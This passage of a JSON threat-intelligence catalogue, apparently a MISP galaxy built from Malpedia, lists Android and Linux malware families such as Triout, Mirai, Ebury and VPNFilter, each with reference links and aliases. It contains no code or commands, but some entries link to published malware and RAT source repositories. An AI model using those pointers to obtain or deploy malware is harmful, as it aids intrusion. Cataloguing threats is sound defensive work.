"https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html" ], "synonyms": [], "type": [] }, "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", "value": "Triada" }, { "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", "https://labs.bitdefender.com/wp-content/uploads/downloads/triout-the-malware-framework-for-android-that-packs-potent-spyware-capabilities/" ], "synonyms": [], "type": [] }, "uuid": "bd9ce51c-53f9-411b-b46a-aba036c433b1", "value": "Triout" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", "https://twitter.com/illegalFawn/status/826775250583035904" ], "synonyms": [], "type": [] }, "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", "value": "Unidentified APK 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" ], "synonyms": [], "type": [] }, "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", "value": "Unidentified APK 002" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" ], "synonyms": [], "type": [] }, "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", "value": "Viper RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/", "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/" ], "synonyms": [], "type": [] }, "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", "value": "WireX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/", "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" ], "synonyms": [], "type": [] }, "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", "value": "Xbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader", "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/" ], "synonyms": [], "type": [] }, "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25", "value": "XLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", "https://blog.lookout.com/xrat-mobile-threat" ], "synonyms": [], "type": [] }, "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", "value": "XRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth", "https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html" ], "synonyms": [], "type": [] }, "uuid": "a2dad59d-2355-415c-b4d6-62236d3de4c7", "value": "YellYouth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen", "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" ], "synonyms": [], "type": [] }, "uuid": "46d6d102-fc38-46f7-afdc-689cafe13de5", "value": "Zen" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", "https://securelist.com/whos-who-in-the-zoo/85394" ], "synonyms": [], "type": [] }, "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", "value": "ZooPark" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", "https://securelist.com/ztorg-from-rooting-to-sms/78775/" ], "synonyms": [ "Qysly" ], "type": [] }, "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", "value": "Ztorg" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/" ], "synonyms": [ "HyperShell" ], "type": [] }, "uuid": "a98a04e5-1f86-44b8-91ff-dbe1534782ba", "value": "TwoFace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001" ], "synonyms": [], "type": [] }, "uuid": "d4318f40-a39a-4ce0-8d3c-246d9923d222", "value": "Unidentified ASP 001 (Webshell)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", "https://news.drweb.com/show/?c=5&i=10193&lng=en" ], "synonyms": [], "type": [] }, "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", "value": "Irc16" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/" ], "synonyms": [ "Gafgyt", "gayfgt", "lizkebab", "qbot", "torlus" ], "type": [] }, "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", "value": "Bashlite" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter", "https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/" ], "synonyms": [], "type": [] }, "uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209", "value": "BCMPUPnP_Hunter" }, { "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html", "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", "https://blogs.cisco.com/security/linuxcdorked-faqs" ], "synonyms": [ "CDorked.A" ], "type": [] }, "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", "value": "CDorked" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" ], "synonyms": [], "type": [] }, "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", "value": "Chapro" }, { "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", "https://github.com/pooler/cpuminer" ], "synonyms": [], "type": [] }, "uuid": "8196b6f6-386e-4499-b269-4e5c65f74141", "value": "Cpuminer (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r", "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html", "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/", "https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html" ], "synonyms": [ "CriptTor" ], "type": [] }, "uuid": "196b20ec-c3d1-4136-ab94-a2a6cc150e74", "value": "Cr1ptT0r" }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/" ], "synonyms": [], "type": [] }, "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", "value": "Ebury" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", "value": "Erebus (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", "https://www.recordedfuture.com/chinese-cyberespionage-operations/" ], "synonyms": [], "type": [] }, "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", "value": "ext4" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot", "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/" ], "synonyms": [], "type": [] }, "uuid": "501e5434-5796-4d63-8539-d99ec48119c2", "value": "FBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.haiduc", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" ], "synonyms": [], "type": [] }, "uuid": "dd85732f-cbf8-4f2c-af5c-f51ef7d99b6a", "value": "Haiduc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://x86.re/blog/hajime-a-follow-up/", "http://blog.netlab.360.com/hajime-status-report-en/", "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", "https://github.com/Psychotropos/hajime_hashes" ], "synonyms": [], "type": [] }, "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", "value": "Hajime" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", "value": "Hakai" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", "https://threatlabs.avast.com/botnet", "https://blog.avast.com/hide-n-seek-botnet-continues", "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html" ], "synonyms": [ "HNS" ], "type": [] }, "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", "value": "Hide and Seek" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", "https://research.checkpoint.com/new-iot-botnet-storm-coming/", "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" ], "synonyms": [ "IoTroop", "Reaper" ], "type": [] }, "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", "value": "IoT Reaper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" ], "synonyms": [], "type": [] }, "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", "value": "JenX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" ], "synonyms": [ "STD" ], "type": [] }, "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", "value": "Kaiten" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", "https://news.drweb.com/news/?i=10140&lng=en" ], "synonyms": [], "type": [] }, "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, { "description": "Masuta takes advantage of the EDB 38722 D-Link exploit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta", "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/", "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7", "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes" ], "synonyms": [ "PureMasuta" ], "type": [] }, "uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd", "value": "Masuta" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", "https://securitykitten.github.io/2016/12/14/mikey.html" ], "synonyms": [], "type": [] }, "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", "value": "MiKey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", "http://osint.bambenekconsulting.com/feeds/", "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", "https://isc.sans.edu/diary/22786", "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/" ], "synonyms": [], "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", "value": "Mirai (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" ], "synonyms": [], "type": [] }, "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", "value": "Moose" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", "https://news.drweb.com/?i=5760&c=23&lng=en" ], "synonyms": [], "type": [] }, "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", "value": "MrBlack" }, { "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", "https://twitter.com/360Netlab/status/1019759516789821441", "https://twitter.com/hrbrmstr/status/1019922651203227653", "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/", "https://twitter.com/ankit_anubhav/status/1019647993547550720" ], "synonyms": [], "type": [] }, "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", "value": "Owari" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", "https://twitter.com/juanandres_gs/status/944741575837528064", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf" ], "synonyms": [], "type": [] }, "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", "value": "Penquin Turla" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" ], "synonyms": [ "DDoS Perl IrcBot", "ShellBot" ], "type": [] }, "uuid": "24b77c9b-7e7e-4192-8161-b6727728170f", "value": "PerlBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" ], "synonyms": [], "type": [] }, "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, { "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], "type": [] }, "uuid": "92a1288f-cc4d-47ca-8399-25fe5a39cf2d", "value": "pupy (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" ], "synonyms": [], "type": [] }, "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", "value": "r2r2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" ], "synonyms": [], "type": [] }, "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", "value": "Rakos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/", "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/" ], "synonyms": [], "type": [] }, "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", "value": "Rex" }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" ], "synonyms": [], "type": [] }, "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", "value": "Satori" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" ], "synonyms": [], "type": [] }, "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", "value": "ShellBind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" ], "synonyms": [], "type": [] }, "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", "value": "Shishiga" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" ], "synonyms": [], "type": [] }, "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", "value": "Spamtorte" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup", "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" ], "synonyms": [], "type": [] }, "uuid": "3ccd3143-c34d-4680-94b9-2cc4fa4f86fa", "value": "SpeakUp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" ], "synonyms": [], "type": [] }, "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", "value": "SSHDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" ], "synonyms": [], "type": [] }, "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless", "https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/" ], "synonyms": [], "type": [] }, "uuid": "d03fa69b-53a4-4f61-b800-87e4246d2656", "value": "Sunless" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", "https://blog.avast.com/new-torii-botnet-threat-research" ], "synonyms": [], "type": [] }, "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", "value": "Torii" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", "http://paper.seebug.org/345/" ], "synonyms": [], "type": [] }, "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", "value": "Trump Bot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", "http://get.cyberx-labs.com/radiation-report", "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/" ], "synonyms": [ "Amnesia", "Muhstik", "Radiation" ], "type": [] }, "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", "value": "Tsunami (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" ], "synonyms": [], "type": [] }, "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", "value": "Turla RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" ], "synonyms": [ "Espeon" ], "type": [] }, "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", "value": "Umbreon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", "https://blog.talosintelligence.com/2018/05/VPNFilter.html", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" ], "synonyms": [], "type": [] }, "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", "value": "elf.vpnfilter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" ], "synonyms": [], "type": [] }, "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", "value": "elf.wellmess" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", "value": "Wirenet (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" ], "synonyms": [ "chopstick", "fysbis", "splm" ], "type": [] }, "uuid": "a8404a31-968a-47e8-8434-533ceaf84c1f", "value": "X-Agent (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", "https://twitter.com/michalmalik/status/846368624147353601" ], "synonyms": [], "type": [] }, "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", "value": "Xaynnalc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" ], "synonyms": [], "type": [] }, "uuid": "ee54fc1e-c574-4836-8cdb-992ac38cef32", "value": "Xbash" }, { "description": "Linux DDoS C&C Malware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", "https://en.wikipedia.org/wiki/Xor_DDoS", "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" ], "synonyms": [], "type": [] }, "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", "value": "XOR DDoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" ], "synonyms": [ "darlloz" 